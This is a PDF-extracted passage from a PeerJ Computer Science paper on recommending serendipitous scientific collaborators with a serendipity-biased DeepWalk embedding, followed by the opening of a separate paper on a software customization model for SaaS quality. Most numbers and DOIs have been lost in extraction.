users, but also have connectivity to other groups. evaluation of serendipitous recommender systems in terms of the evaluation of the proposed serendipitous recommendation strategies, the widely used metrics are unexpectedness, usefulness and serendipity, where serendipity is the combination of unexpectedness and usefulness metrics. adamopoulos & tuzhilin ( ) xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. considered that an unexpected item is not contained in the set of expected items of the target user, and the usefulness of an item can be approximated by the items’ ratings given by users. murakami, mori & orihara ( ) and ge, delgado-battenfeld & jannach ( ) indicated that the unexpectedness metric is determined by the primitive recommendation methods which produce relevant recommendations, and the item not in primitive recommendation set is regarded as an unexpected item. the serendipity of the recommendation list is determined by the rate of both unexpected and useful items (zheng, chan & ip, ; ge, delgado-battenfeld & jannach, ; murakami, mori & orihara, ). meanwhile, zheng, chan & ip ( ) suggested that the usefulness of a recommended item depends on whether the target user selects or favors it. these literatures shed some light on the development of serendipitous recommender systems in different fields. our work also refer to them for extracting the core components of serendipity, and evaluating the serendipitous recommendations from the serendipity- based metrics. the definition of serendipitous collaborators ‘‘serendipity’’ has been recognized as one of the most untranslatable words. the term serendipity origins from a fairy tale, ‘‘the three princes of serendip’’ (west, ). the three princes were always making fortunate discoveries in their wandering adventures, and the accidental but valuable discoveries denote serendipity. nevertheless, it is unclear what makes a collaborator serendipitous to his/her target scholar. in this paper, we define serendipitous scientific collaborators from three components: relevance, unexpectedness and value, corresponding with the indices of network proximity, topic diversity, and collaborator influence, respectively. we describe the details of these indices and their quantifications in the following three subsections. relevance score relevance between target scholar and his/her collaborators may be quantified with their proximity in co-author network. therefore, we perform random walk with restart (rwr) (vargas & castells, ; tong, faloutsos & pan, ) in the co-author network for computing the relevance score of all collaborator nodes for their target scholars. finally, we get the relevance score between each pair of collaborators. unexpectedness score unexpected scientific collaborators have connectivity to different research areas of their target scholars. such unexpected collaborators may expand target scholars’ horizons, since they have diverse research topics compared with their target scholars. we get each scholar’s research areas by lda (blei, ng & jordan, ), and a collaborator who has connectivity to other areas different from that of his/her target scholar is regarded as a unexpected collaborator. lda computes the cosine similarity between the topic probability distribution of each scholar and area, where the topic probability distribution of a scholar is parsed from his/her publication contents, and the topic probability distribution of an area is extracted from the proportion of each topic contained in this area. the areas xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the framework of seren vec. the core of this framework is the attachment of serendipity to the collaboration edges, and the edge weight is quantified based on the three indices in definition in a linear way. therefore, seren vec contributes to a serendipity-biased representation learn- ing. full-size doi: . /peerjcs. /fig- with similarity higher than . are regarded as the research areas of a scholar. finally we add the betweenness centrality (leydesdorff, ) of a collaborator node with the number of communities it crosses as its unexpectedness score for its target scholar, since betweenness centrality represents the ability of a node to transfer information among separate communities in a network, which stresses the strong position of unexpected node. value score value of a scholar is defined as the influence of this scholar node, and more influential nodes are more valuable for his/her collaborators in co-author network. we compute the value scores of all collaborator nodes with the eigenvector centrality (bonacich, ), where the centralized value of a node is determined by the nodes linked by it. if the high-degree node connects with the target node, it usually are more valuable than those low-degree nodes for the target node. besides, the influence of a node not only depends on its degree, but also depends on its neighbor nodes’ influences according to the peculiarity of eigenvector centrality. the relevance, unexpectedness, and value scores are computed between each pair of collaborators according to above quantification methods. a serendipitous collaborator has high unexpectedness score, high value score, and low relevance score for his/her target scholar relatively. the framework of seren vec in this section, we propose the framework of seren vec, which aims to recommend serendipitous collaborators for scholars by learning the vector representation of each author node in co-author network. the whole framework of seren vec is shown in fig. , which contains four main steps: ( ) compute the relevance, unexpectedness and value scores of each collaborator for his/her target scholar. ( ) construct a co-author network based on the collaboration data extracted from dblp, where the edge weight is determined by the linear combination of relevance, unexpectedness and value scores. ( ) perform seren vec in co-author network, where the walker jumps to the next node b from node a with the proportional probability of their edge weight. the edge weight xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. is attached with the extent of serendipity, i.e., w in fig. shows the serendipity extent brought by b for target scholar a. ( ) learn the representations of all author nodes with low dimensional vectors, and then compute the cosine similarity betweenauthor vectors for generating the recommendation list composed of top-n similar collaborators. integrate serendipity into co-author network we first integrate serendipity into co-author network g=(v,e) for vector representation learning of author nodes. the node v ∈v in network represents the author, and edge e ∈e reflects the collaboration relationship between two connected nodes. we attach the serendipity of a collaborator for his/her target scholar to their edge weight. from fig. , our co-author network is directed, because the edge weight of node a to b is different from that of b to a. in other words, the serendipity brought by a for b is different from that of b for a, since a’s relevance, unexpectedness and value scores for b are different from that of b for a. serendipitous collaborators are unexpected and valuable, but less relevant for their target scholars; therefore, we combine three indices as the edge weight in a linear way. the expression of edge weight is as follows: w =α×rs+β×us+γ ×vs, ( ) where rs,us and vs represent the relevance score, unexpectedness score, and value score, respectively. while α is smaller than β and γ , as α determines the proportion of relevance score, and α+β+γ = . we aim to adjust these parameters and find the optimal collocation of them by analyzing the experimental results. seren vec we improve the traditional deepwalk model to learn vector representations of author nodes in co-author network for our recommendation task. in terms of deepwalk, the walker during random walk jumps to the next node with the equal probability, n , where n represents the number of last node’s collaborators. deepwalk excludes the importance or corresponding attributes of nodes. take the random walk process in fig. as an example, the walker arrives at node a, and continues to walk to the next node. it will walk to b with the probability of according to deepwalk. in this work, we distinguish the importance of all collaborator nodes based on their serendipity extent for their target nodes. the extent of serendipity brought by collaborator b for target scholar a corresponds to their edge weight w . if w is higher than w and w , the walker will jump to b from a with higher probability. we attach serendipity to the edge weight in co-author network, and finally guide to a serendipity-biased deepwalk. as a consequence, the representation of the author vector will carry the attribute of serendipity. if a collaborator is serendipitous for a target scholar, his/her vector representation is similar with that of target scholar. the complete algorithm is described in algorithm , where b represents the set of betweenness centralities with respect to each author node, and bi denotes the betweenness centrality of xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the flow chart of seren vec. seren vec includes three main processes: integration of serendip- ity into deepwalk, vector representation learning of each scholar, and collaborators recommendation based on the cosine similarity between vectors. full-size doi: . /peerjcs. /fig- node i.rs(i,j),us(i,j),vs(i,j) correspond with the relevance score, unexpectedness score, and value score of collaborator j for his/her target scholar i, respectively. the flow chart of seren vec is shown in fig. . vector representation of graph the random walker walks on the co-author network with the probability of p(i,j) from the scholar node i to its collaborator node j: p(i,j)= weight(i,j)∑ q∈m(i),q =iweight(i,q) , ( ) where m(i) is the set of scholar i’s collaborators. we can find from perozzi, al-rfou & skiena ( ) that if the random walk algorithm is performed on the network with power law distribution, the nodes being visited also follow the power law distribution. this is the same distribution with the term frequency in natural language. therefore, it is reasonable xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. algorithm : seren vec input: graph g= (v,e), transfer matrix t , betweenness centrality set b, community degree set c, eigenvector centrality set e, parameter α, parameter β, parameter γ , context size w, dimension of vertex vector d, walks per vertex r, walk length l, length of recommendation list n output: recommendation list rec for edge(i,j)∈e do rs(i,j)=rwr(j,t); for edge(i,j)∈e do us(i,j)=bj+cj; for edge(i,j)∈e do vs(i,j)=ej; build the weighted co-author network; for edge(i,j)∈e do weight(i,j)=α×rs(i,j)+β×us(i,j)+γ ×vs(i,j); for k= ;k <r;k++do for u∈v do walk[u]=biased random walk(g,u,l); p =skipgram(walk,w); for t = ;t <row(p);t++do rec[t]=top-n similar collaborators; return rec; to regard a node in network as a word, and consider all the previous vertices being visited in the random walk as the sentence. moreover, we utilize the word vec (mikolov et al., ) model to input the sentence sequences generated during random walk into the skip-gram model, and take advantages of the stochastic gradient descent and the back propagation algorithm to optimize the vector representations. finally, we obtain the optimal vector representation of each vertex in our co-author network. specifically, in order to learn the vector representations of vertices, seren vec makes use of the local information from the truncated random walks by maximizing the probability of a vertex vi in terms of the previous vertices being visited in the random walk: p({vi−w,...,vi+w}\vi|φ(vi))= i+w∑ j=i−w,j =i p(vj|φ(vi)), ( ) where φ denotes the latent topological representation associated with each vertex vi in the graph, and φ is a matrix with |v |×d. for speeding the training time, hierarchical softmax is used to approximate the probability distribution by allocating the vertices to the leaves xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. of the binary tree, and we compute p(vj|φ(vi)) as follows: p(vj|φ(vi))= dlog|n|e∑ l= +e−φ(vi)·ψ(sl) , ( ) where ψ(sl) represents the parent of the tree node sl. in addition, (s ,s ,...,slog|v |) is the sequence to detect the vertex vj, and s is the tree root. the output of seren vec is the latent vector representations of all scholar nodes with d-dimension in our co-author network. we calculate the cosine similarity between other vectors with the target scholar vector vi: sim(xvi,xvj )= xvi ·xvj√ |xvi|·|xvj| ,vj ∈v and vj =vi. ( ) finally, top-n similar scholars, who are serendipitous to the target scholar, are contained in the collaborator list for recommendation. experiments in this section, we analyze and compare the performance of seren vec with other baseline methods for the serendipitous collaborators recommendation. we initialize the context size w as , the vector dimension d as , number of walks r as , and walk length l as for conducting experiments. data set we extract collaboration data from five areas including artificial intelligence, computer graphics and multimedia, computer networks, data mining and software engineering in dblp data set. the co-author network is built by utilizing the collaboration data from year to , and there are , nodes and , edges in the network. we randomly choose authors who have one collaborator at least as the target scholars, and the final goal of our work is to recommend the serendipitous collaborators for them via seren vec. baseline methods deepwalk deepwalk (perozzi, al-rfou & skiena, ) is a widely used network embedding algorithm, which learns the latent vector representations of nodes in a network. it takes a graph as input and outputs the latent vector representations of all nodes in graph. deepwalk can be easily utilized to obtain the author vectors. the core idea of deepwalk is to take the random walk paths in network as sentences, and nodes as words. applying the sentence sequences to skipgram enable to learn the distributed representations of nodes. node vec node vec (grover & leskovec, ) is a improved version of deepwalk. it improves the strategy of random walk through the parameters p and q, and considers the macrocosmic and microcosmic information simultaneously. node vec controls the transition probability of walker, where p represents the returning probability, and q denotes the probability of jumping to the next node. while deepwalk sets both p and q at , and ignores other factors that will influence the generation of sentence sequences. xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. rwrw we also compare our seren vec with the baseline algorithm which does not adopt the vector representation strategy. therefore, we run the serendipity-biased random walk with restart algorithm on our weighted co-author network (rwrw) for comparison. tangent the tangent (onuma, tong & faloutsos, ) algorithm is designed to recommend the relevant collaborators who have connectivity to other groups. kfn the kfn (said et al., ) algorithm aims to recommend the novel collaborators who are disliked by the dissimilar neighborhood of the target scholar. this approach is contrary to k nearest neighbors (knn) (deng et al., ). evaluation metrics we refer to the metrics in ge, delgado-battenfeld & jannach ( ), zheng, chan & ip ( ) and kotkov, wang & veijalainen ( ) for evaluating our serendipitous collaborators recommendation, which are the serendipity-based metrics including unexpectedness, value and serendipity. we compute the average rs and us of each target scholars’s collaborators. if rs of one collaborator is higher than the average rs, and on the contrary, his/her us is lower than the average us, we regard this collaborator as the expected one of target scholar. expected collaborators are more relevant and less unexpected than other collaborators for their target scholars. according to ge, delgado-battenfeld & jannach ( ) and zheng, chan & ip ( ), a recommended collaborator not in the set of target scholar’s expected collaborators is considered as unexpected. therefore, we extract the expected collaborators of each target scholar first, and a recommended collaborator not in the expected set is evaluated as unexpected. the unexpectedness is measured as the rate of unexpected collaborators in the recommendation list. in terms of the metric of value, zheng, chan & ip ( ) measured the usefulness of a recommended item through its rating given by the target user. while in our recommendation scenario, we analyze the collaboration times between the recommended collaborator and target scholar in the next years. if their collaboration times is over or equal to times from to , the recommended collaborator is evaluated as valuable. besides, the value is measured as the rate of valuable collaborators in the recommendation list. ge, delgado-battenfeld & jannach ( ) combined the unexpectedness and value metric to evaluate serendipity. similarly, we measure serendipity through the rate of collaborators who are both unexpected and valuable for the target scholar in the recommendation list. recommendation results analysis we take the widely used serendipity-based metrics to evaluate our recommendation results, including unexpectedness, value and serendipity. therefore, the evaluations are no longer limited by the accuracy-based metrics. in this section, we examine the effects of different experimental parameter sets on the recommendation performance, including the range of d, r, l, w, different combinations of α, β and γ , and the length of recommendation list n . xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure effects of the recommendation list length and different combinations of α, β and γ on rec- ommendation performance via seren vec. (a) precision (b) recall (c) unexpectedness (d) value and (e) serendipity of the recommendations. (when α= . ,β= . , and γ = . , seren vec shows the highest precision, value and serendipity. meanwhile, the optimal n is ). full-size doi: . /peerjcs. /fig- effects of the recommendation list we measured the recommendation results with different length of recommendation list n and different combinations of α,β and γ via seren vec. the results shown in fig. indicate that when α= . , β= . and γ = . , the recommendation performance is better than others with respect to the precision fig. a), value (fig. d) and serendipity (fig. e) evaluations. we also find that the optimal n is . the precision, value and serendipity decrease with the increases of n , which are contrary to the recall (fig. b) and unexpectedness (fig. c). furthermore, the unexpectedness of different combinations keeps close distributions with the variation of n . furthermore, we show the effects of the recommendation list length with α= . ,β= . , and γ = . via different baseline methods. from fig. , node vec obtains the highest precision (fig. a) and recall (fig. b), but it shows the worst performance from the serendipity-based metrics (figs. c– e) evaluation. our seren vec outperforms others in terms of the serendipity-based metrics, and keeps adequate accuracy simultaneously. rwrw has lower precision than seren vec because it lacks the vector representation process, but it has the second highest serendipity finally because of the serendipity-biased random walk. meanwhile, the collaborators recommended by seren vec show higher unexpectedness than others when the length of recommendation list is lower than . node vec and deepwalk share close serendipity with low value, because they have not integrated other serendipity-related elements into the vector representation learning. xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure effects of the recommendation list length with α = . ,β = . , and γ = . on rec- ommendation performance via different baseline methods. (a) precision (b) recall (c) unexpectedness (d) value and (e) serendipity of the recommendations. (node vec shows the highest accuracy. seren vec shows the highest serendipity, and it is superior to rwrw in terms of the precision evaluation). full-size doi: . /peerjcs. /fig- parameter sensitivity we tested the recommendation performance with different parameters, and the length of recommendation list is optimally five according to the last subsection. when testing one parameter of l (fig. a), r (fig. b), d (fig. c), w (fig. d) with different values on the recommendation performance, we fix other three parameters with corresponding initial values. we can get from fig. that the measurements from both accuracy-based and serendipity-based metrics almost have the steady distributions under different parameter sets. we take the set where r = , d = , l = and w = as our final parameter set, since each of them contributes to the highest serendipity and maintains adequate accuracy simultaneously. performance comparison next, we compare our seren vec which are assigned to the optimal parameters with other two baseline methods. we set the length of recommendation list of tangent and kfn as , which is the same with seren vec. from the comparison results in fig. , seren vec obtains better performance for recommending the serendipitous collaborators via the evaluations from serendipity-based metrics, since it adopts the serendipity-biased representation learning strategy. its highest value contributes to the highest serendipity. tangent and kfn stress the unexpectedness of recommendations, but they ignore the value component of serendipity. therefore, they are inferior to seren vec in terms of the serendipity evaluation. seren vec outperforms other two methods except for the unexpectedness evaluation, which is . lower than the unexpectedness of tangent, xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure effects of different d, r, l and w on recommendation performance. (a) the effects of l (b) r (c) d and (d) w. (seren vec almost keeps steady distribution on recommendation performance with the variation of parameters). full-size doi: . /peerjcs. /fig- but . higher than that of kfn. furthermore, we find that the recall of three methods are very low, and seren vec has higher recall than tangent and kfn slightly. in summary, our proposed seren vec is superior to other baseline methods for recommending more serendipitous collaborators. it learns the serendipity-biased vector representation of each author node in co-author network successfully, which integrates the serendipity between two connected nodes. conclusion this paper introduces the scientific collaborators from a new perspective of serendipity. the serendipitous collaborator has high topic diversity, high influence and low proximity in co-author network for his/her target scholar relatively. we focused on designing an effective algorithm to integrate serendipity into collaborators recommender system. specifically, we improved the deepwalk algorithm, where the sentence sequences are generated by performing a serendipity-biased random walk. seren vec represents the author nodes in the co-author network with the low-dimensional vectors, which are attached with the attributes of serendipity successfully. finally, we computed the cosine similarity between xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure performance comparisons between different recommendation methods. (seren vec is supe- rior to tangent and kfn by evaluating from both precision and serendipity metrics). full-size doi: . /peerjcs. /fig- the vector of target scholar and other vectors, and extracted top-n similar collaborators for recommendation. the extensive experiments are conducted on the dblp data set, and the experimental results show that seren vec is more effective than other baseline approaches by evaluating from the serendipity-based metrics. seren vec improves the serendipity of recommendation list and maintains adequate accuracy simultaneously. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • zhenzhen xu analyzed the data. • yuyuan yuan conceived and designed the experiments, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper. • haoran wei performed the experiments, performed the computation work. • liangtian wan contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. data availability the following information was supplied regarding data availability: data is available at https://snap.stanford.edu/data/com-dblp.html. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references adamopoulos p, tuzhilin a. . on unexpectedness in recommender systems: or how to better expect the unexpected. acm transactions on intelligent systems and technology ( ):article . araki m, katsurai m, ohmukai i, takeda h. . interdisciplinary collaborator recommendation based on research content similarity. ieice transactions on information and systems ( ): – doi . /transinf. dap . blei dm, ng ay, jordan mi. . latent dirichlet allocation. journal of machine learning research (jan): – . bonacich p. . some unique properties of eigenvector centrality. social networks ( ): – doi . /j.socnet. . . . deng z, zhu x, cheng d, zong m, zhang s. . efficient knn classification algorithm for big data. neurocomputing : – doi . /j.neucom. . . . ge m, delgado-battenfeld c, jannach d. . beyond accuracy: evaluating recommender systems by coverage and serendipity. in: proceedings of the fourth acm conference on recommender systems. new york: acm, – doi . / . . goldberg y, levy o. . word vec explained: deriving mikolov et al.’s negative- sampling word-embedding method. arxiv preprint. arxiv: . . gollapalli sd, mitra p, giles cl. . similar researcher search in academic environ- ments. in: proceedings of the th acm/ieee-cs joint conference on digital libraries. new york: acm, – doi . / . . grover a, leskovec j. . node vec: scalable feature learning for networks. in: proceedings of the nd acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – doi . / . . hameed ma, al jadaan o, ramachandram s. . collaborative filtering based recommendation system: a survey. international journal on computer science and engineering ( ): – . heck t, peters i, stock wg. . testing collaborative filtering against co-citation analysis and bibliographic coupling for academic author recommendation. in: proceedings of the rd acm recsys’ workshop on recommender systems and the social web. new york: acm, – . herlocker jl, konstan ja, terveen lg, riedl jt. . evaluating collaborative filtering recommender systems. acm transactions on information systems (tois) ( ): – doi . / . . xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://snap.stanford.edu/data/com-dblp.html http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /transinf. dap http://dx.doi.org/ . /j.socnet. . . http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . / . http://arxiv.org/abs/ . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. hofmann t. . probabilistic latent semantic indexing. acm sigir forum ( ): – doi . / . . iaquinta l, de gemmis m, lops p, semeraro g, molino p. . can a recommender system induce serendipitous encounters? in: e-commerce. london: intech. jannach d, zanker m, felfernig a, friedrich g. . recommender systems: an introduction. cambridge: cambridge university press. kim h-n, ji a-t, ha i, jo g-s. . collaborative filtering based on collaborative tagging for enhancing the quality of recommendation. electronic commerce research and applications ( ): – doi . /j.elerap. . . . kong x, jiang h, wang w, bekele tm, xu z, wang m. . exploring dynamic research interest and academic influence for scientific collaborator recommendation. scientometrics ( ): – doi . /s - - - . kong x, jiang h, yang z, xu z, xia f, tolba a. . exploiting publication con- tents and collaboration networks for collaborator recommendation. plos one ( ):e doi . /journal.pone. . konstas i, stathopoulos v, jose jm. . on social networks and collaborative recommendation. in: proceedings of the nd international acm sigir conference on research and development in information retrieval. new york: acm, – doi . / . . kotkov d, veijalainen j, wang s. . challenges of serendipity in recommender sys- tems. in: proceedings of the th international conference on web information systems and technologies, volume . scitepress, – doi . / . kotkov d, wang s, veijalainen j. . a survey of serendipity in recommender systems. knowledge-based systems : – doi . /j.knosys. . . . leydesdorff l. . betweenness centrality as an indicator of the interdisciplinarity of scientific journals. journal of the association for information science and technology ( ): – . lopes gr, moro mm, wives lk, de oliveira jpm. . collaboration recommenda- tion on academic social networks. in: international conference on conceptual modeling, vol. . berlin, heidelberg: springer, – doi . / - - - - _ . manca m, boratto l, carta s. . behavioral data mining to produce novel and serendipitous friend recommendations in a social bookmarking system. information systems frontiers ( ): – . mcnee sm, riedl j, konstan ja. . being accurate is not enough: how accuracy metrics have hurt recommender systems. in: chi’ extended abstracts on human factors in computing systems. new york: acm, – . mikolov t, sutskever i, chen k, corrado gs, dean j. . distributed representations of words and phrases and their compositionality. neural information processing systems : – . murakami t, mori k, orihara r. . metrics for evaluating the serendipity of recommendation lists. in: annual conference of the japanese society for artificial intelligence. berlin, heidelberg: springer, – doi . / - - - - _ . xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . /j.elerap. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . / . http://dx.doi.org/ . / http://dx.doi.org/ . /j.knosys. . . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /peerj-cs. onuma k, tong h, faloutsos c. . tangent: a novel,’surprise me’, recom- mendation algorithm. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – doi . / . . perozzi b, al-rfou r, skiena s. . deepwalk: online learning of social rep- resentations. in: proceedings of the th acm sigkdd international con- ference on knowledge discovery and data mining. new york: acm, – doi . / . . said a, fields b, jain bj, albayrak s. . user-centric evaluation of a k-furthest neighbor collaborative filtering recommender algorithm. in: proceedings of the conference on computer supported cooperative work. new york: acm, – doi . / . . sean j, mcnee m, konstan j. . accurate is not always good: how accuracy metrics have hurt recommender systems. in: extended abstracts on human factors in computing systems (chi ). – . shani g, gunawardana a. . evaluating recommendation systems. in: recommender systems handbook. berlin, heidelberg: springer, – doi . / - - - - _ . tian h, zhuo hh. . paper vec: citation-context based document distributed representation for scholar recommendation. arxiv preprint. arxiv: . . tong h, faloutsos c, pan j-y. . random walk with restart: fast solutions and applications. knowledge and information systems ( ): – doi . /s - - - . vargas s, castells p. . rank and relevance in novelty and diversity metrics for recommender systems. in: proceedings of the fifth acm conference on recommender systems. new york: acm, – doi . / . . wang w, yu s, bekele tm, kong x, xia f. . scientific collaboration patterns vary with scholars’ academic ages. scientometrics ( ): – doi . /s - - - . west ss. . three princes of serendip. science ( ): – . xia f, chen z, wang w, li j, yang lt. . mvcwalker: random walk-based most valu- able collaborators recommendation exploiting academic factors. ieee transactions on emerging topics in computing ( ): – doi . /tetc. . . zhang m, hurley n. . avoiding monotony: improving the diversity of recommen- dation lists. in: proceedings of the acm conference on recommender systems. new york: acm, – doi . / . . zhang yc, séaghdha dÓ, quercia d, jambor t. . auralist: introducing serendipity into music recommendation. in: proceedings of the fifth acm international conference on web search and data mining. acm, – doi . / . . zheng q, chan c-k, ip hh. . an unexpectedness-augmented utility model for making serendipitous recommendation. in: industrial conference on data mining. berlin, heidelberg: springer, – doi . / - - - - _ . xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / - - - - _ http://arxiv.org/abs/ . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tetc. . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /peerj-cs. submitted march accepted august published september corresponding author abdulrazzaq qasem ali, abdulraz- zaq.alyhari@gmail.com academic editor stefan wagner additional information and declarations can be found on page doi . /peerj-cs. copyright ali et al. distributed under creative commons cc-by . open access development of a valid and reliable software customization model for saas quality through iterative method: perspectives from academia abdulrazzaq qasem ali, abu bakar md sultan, abdul azim abd ghani and hazura zulzalil department of software engineering and information system, faculty of computer science and information technology, universiti putra malaysia, serdang, selangor, malaysia abstract despite the benefits of standardization, the customization of software as a service (saas) application is also essential because of the many unique requirements of customers. this study, therefore, focuses on the development of a valid and reliable software customization model for saas quality that consists of ( ) generic software customization types and a list of common practices for each customization type in the saas multi-tenant context, and ( ) key quality attributes of saas applications associated with customization. the study was divided into three phases: the conceptualization of the model, analysis of its validity using saas academic-derived expertise, and evaluation of its reliability by submitting it to an internal consistency reliability test conducted by software-engineer researchers. the model was initially devised based on six customization approaches, customization practices, and quality attributes in the saas multi-tenant context. subsequently, its content was validated over two rounds of testing after which one approach and practices were removed and practices were reformulated. the internal consistency reliability study was thereafter conducted by software engineer researchers. all constructs of the content-validated model were found to be reliable in this study. the final version of the model consists of constructs and items. these six constructs and their associated items are as follows: ( ) configuration (eight items), ( ) composition (four items), ( ) extension (six items), ) integration (eight items), ( ) modification (five items), and ( ) saas quality ( items). the results of the study may contribute to enhancing the capability of empirically analyzing the impact of software customization on saas quality by benefiting from all resultant constructs and items. subjects distributed and parallel computing, emerging technologies, software engineering keywords customization approaches, content validity, iterative method, model development, reliability study, saas quality, software as a service introduction software maintenance comprises a significant portion ( %) of the total software implementation costs (lee, park & lim, ). according to yang, yoo & jahng ( ), ‘‘more than % of the it budget is spent just maintaining and running existing systems and software infrastructure". the increase in development and operating costs, which how to cite this article ali aq, md sultan ab, abd ghani aa, zulzalil h. . development of a valid and reliable software customiza- tion model for saas quality through iterative method: perspectives from academia. peerj comput. sci. :e http://doi.org/ . /peerj- cs. https://peerj.com/computer-science mailto:abdulrazzaq.alyhari@gmail.com mailto:abdulrazzaq.alyhari@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. http://doi.org/ . /peerj-cs. was also one of the main reasons for the failure of application service provider (asp) in the s (de miranda, ), is inevitable. as a result, the demand for a software as a service (saas) model is increasing because the costs of hardware, technology, maintenance, and tenant management are lower (walraven, ; walraven et al., ; shen et al., ; ali et al., ). some problems, such as customization complexities (walraven, ; walraven et al., ; guo et al., ; al-shardan & ziani, ; walraven, truyen & joosen, ), for the implementation of saas applications remain. customization is an essential requirement for providing the same application to different users (walraven, ; ali et al., b), as they may have different business flow, interfaces, and data (tsai, zhong & chen, ). consequently for the hosts of saas applications, this requirement will pose quality challenges and risks (al-shardan & ziani, ; rolia et al., ). all saas application components are influenced by user-specific customization, including both functional and non-functional aspects of all layers of saas architecture (tsai, shao & li, ). another complication is having to span multiple layers of saas architecture (al- shardan & ziani, ). all saas application elements, including those with cross-layer relationships, must be customizable. moreover, customization includes adjustments to the softwares source code that becomes highly complex in the saas model (walraven, ; walraven et al., ; guo et al., ; sun et al., ). changes in the requirements often occur after applications and services have been developed; therefore, runtime customization must be provided within the same software instance for different users (walraven, ; walraven et al., ; ali et al., a; van landuyt, walraven & joosen, ), and should not impact their privacy and the applications availability (walraven, ; van landuyt, walraven & joosen, ). generally, saas applications lack the customizability of on-premises applications (yang, yoo & jahng, ), which would result in reduced software maintenance (samir & darwish, ; xin & levina, ). by contrast, frequent customization of the saas application would require a burdensome maintenance process and pose a significant challenge to scalability and cost-efficiency (walraven et al., ; van landuyt, walraven & joosen, ). therefore, application vendors should be cautious about their technical capacity when making customization assessments (sun et al., ; samir & darwish, ), especially when customization impacts the crucial features of saas (walraven, ; walraven et al., ; joha & janssen, ; espadas et al., ). there is insufficient evidence in the available studies to assess the effect of software customization on saas attributes (ali et al., a). accordingly, it is important that the type of customization be specified to assess the associated impact and risk (chaumun et al., ) as the software quality are likely to be influenced by any change (parthasarathy & sharma, ; parthasarathy & sharma, ). although several researchers have reported the need to consider the customization of saas applications, no clear effort has been made to categorize software customization types and practices in a multi-tenant context. accordingly, research is required to establish a clear model that considers: ( ) generic software customization types and a list of common practices for each client in the saas multi-tenant context, and ( ) key quality attributes associated with customization. evidence ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. of the content validity and reliability of the proposed model are reported in detail in this study. two main calculations are considered for content validity: the item content validity index (i-cvi) of each customization practice and saas quality attributes, and the scale content validity index (s-cvi/ave). similarly, two quantities are evaluated to determine the internal consistency reliability of the model in this study: cronbach’s alpha coefficient, and the corrected item-total correlation. the structure of this manuscript is as follows. the next section discusses the related works. the third section presents the conceptualization of the model. the fourth section explains the methodology used, whereas the fifth section reports the results of the conducted study, followed by a discussion in the sixth section and threats to validity in the seventh section. finally, conclusions and future work are presented in the eighth section. related work this study presents an approach iteratively to develop, refine, and improve a software customization model for saas quality that was initially constructed in (ali et al., b). the main components of this model are the customization types, common customization practices of each type, and quality attributes of saas applications associated with customization. to the best of our knowledge, no model based on these criteria has been developed and validated. however, in this section, we review the literature on generic saas customization options, followed by the literature on quality models for saas applications. saas customization different types of customization based on the layers of saas architecture and customization objects have been suggested (li, shi & li, ; tsai & sun, ; al-shardan & ziani, ). li, shi & li ( ) illustrated five types of customization: gui customization, service customization, process customization, data customization, and cross-layer customization. tsai & sun ( ) considered the customization of gui, service, process, data, and qos. al-shardan & ziani ( ) defined three different types of saas customization: user interface, workflow, and access control. conversely, some studies classified saas customization based on how customization was performed. tsai & sun ( ) explained three types of customization: source code, composition, and configuration. based on where the customizations are hosted and executed, the work of müller et al. ( ) proposed three types of customization for multi-tenant saas applications: desktop integration, user-interface customization, and back-end customization. 